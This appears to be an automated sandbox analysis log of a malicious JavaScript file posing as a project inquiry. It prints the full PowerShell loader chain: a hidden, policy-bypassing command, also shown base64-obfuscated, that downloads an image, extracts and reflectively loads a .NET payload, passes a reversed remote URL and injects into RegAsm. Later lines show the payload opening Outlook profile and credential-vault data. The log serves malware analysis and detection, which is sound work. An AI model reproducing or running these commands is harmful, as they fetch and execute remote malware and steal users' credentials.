?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\atrophiante.js"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\atrophiante.js"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js

Static file information: File size 1346674 > 1048576

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
